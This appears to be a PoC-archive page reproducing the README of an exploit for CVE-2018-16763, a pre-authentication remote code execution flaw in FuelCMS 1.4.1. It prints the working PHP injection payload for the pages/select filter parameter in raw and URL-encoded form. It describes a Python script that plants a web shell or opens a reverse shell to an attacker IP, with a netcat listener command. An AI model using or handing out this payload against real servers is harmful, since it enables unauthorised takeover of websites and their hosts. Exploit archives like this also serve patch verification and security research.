来源

关联漏洞

描述

FuelCMS 1.4.1 Command Injection/Remote Code Execution.

介绍

# # CVE-2018-16763 FuelCMS - 1.4.1 - RCE PoC
FuelCMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.

# # Exploit
This works by exploiting the PHP **filter** parameter which allows you to use the ``system`` function to send arbitrary commands.

Then the payload is obfuscated:

``'+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'`` 

So it looks something like this:

``http://<TARGET>/fuel/pages/select/?filter='+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'``

And then url-encode all characters:

``http://<TARGET>/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27%3CYOUR%20COMMAND%20HERE%3E%27%29%2B%27``

Thanks to <a href='https://github.com/om3rcitak'>Omer Citak</a> for finding this vulnerability.

# # Usage
You run the exploit using ``python3 cve-2018-16763.py``

And you can Enter **1** for **Web-Shell** or **2** for **Reverse-Shell**

# # Web-Shell
For the **Web-Shell** all you need is to Provide your **TARGET URL**:
<img width="708" height="233" alt="webshell" src="https://github.com/user-attachments/assets/c160a17b-4209-4f96-a1bb-059fa40c39b6" />



# # Reverse-Shell
Setup a listener ``nc -lvnp <PORT>``

Run the exploit and Provide the following:
1. TARGET URL
2. ATTACKER IP
3. LISTENER PORT
<img width="714" height="258" alt="image" src="https://github.com/user-attachments/assets/0ac97d77-8645-4690-9446-955d9d0e9450" />

shell gained.

<img width="480" height="287" alt="image" src="https://github.com/user-attachments/assets/e4e7f0b3-63e9-4103-a79c-db8942c58a97" />

文件快照

 [4.0K]  /data/pocs/91e9e4f982251a01f54c8353ffa1ee59c5c6d205
├── [2.9K]  cve-2018-16763.py
└── [1.6K]  README.md

0 directories, 2 files

备注